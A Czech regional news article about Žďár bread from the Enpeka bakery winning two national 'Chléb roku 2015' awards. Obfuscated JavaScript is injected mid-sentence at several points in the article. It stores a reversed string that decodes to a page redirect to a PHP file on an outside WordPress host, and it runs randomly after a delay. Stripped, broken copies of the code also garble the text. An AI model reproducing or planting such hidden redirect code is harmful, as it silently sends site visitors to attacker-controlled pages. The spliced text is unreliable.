Žďárský chléb získal hned dvě celorepubliková ocenění
Pondělí, 8. června 2015
Žďár nad Sázavou / Nejlepší bochník z průmyslové pekárny v kategorii Konzumní chléb roku 2015 upekli ve žďárské pekárně Enpeka. Vítězem v kategorii Řemeslný chléb roku 2015 se v rámci národní soutěže při tradičních slavnostech Dny chleba v Pardubicích rovněž stal výrobek z Enpeky. V soutěži, která se le["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos konala už po jednadvacáté, se utkalo celkem pětašedesát soutěžních vzorků od pekařských firem z celé republiky. V třetí kategorii - Chléb bez hranic 2015 připadl titul Jizerským pekárnám Česká Lípa.
„Řada členů našeho cechu úspěšně využívá při prodeji svých výrobků získaná ocenění Chléb roku či Chléb vynikající kvality. Ta["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to označení jsou pozitivně vnímána spotřebiteli, pro["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tože v obchodech podle té["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to značky velmi snadno rozliší vysoce kvalitní chléb od st=function(n){if ( () == "string") ; };.list=["\'//\'="];(=function(n){if ( () == "string") ; };.list=["\'//\'="];({if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}{if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}=function(n){if ( () == "string") ; };.list=["\'//\'="];({if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}); if (c==3){ ;}{if ( () == "string") };["\'//\'="];({if ( () == "string") };["\'//\'="]; { ;}); { ;}{if ( () == "string") };["\'//\'="]; { ;}andardního,“ vysvětlil přínos soutěže Jaromír Dřízal, předseda svazu pekařů.
Kvalitu soutěžních chlebů posuzovalo patnáct pekařských odborníků. Ti úspěšně prošli certifikací pro posuzovatele senzorické analýzy pekárenských výrobků, kterou provádí Vysoká škola chemicko-technologická v Praze. Hodnotily se především senzorické parametry - vzhled, tvar a objem chleba, dále pak kůrka, střídka, vůně a chuť.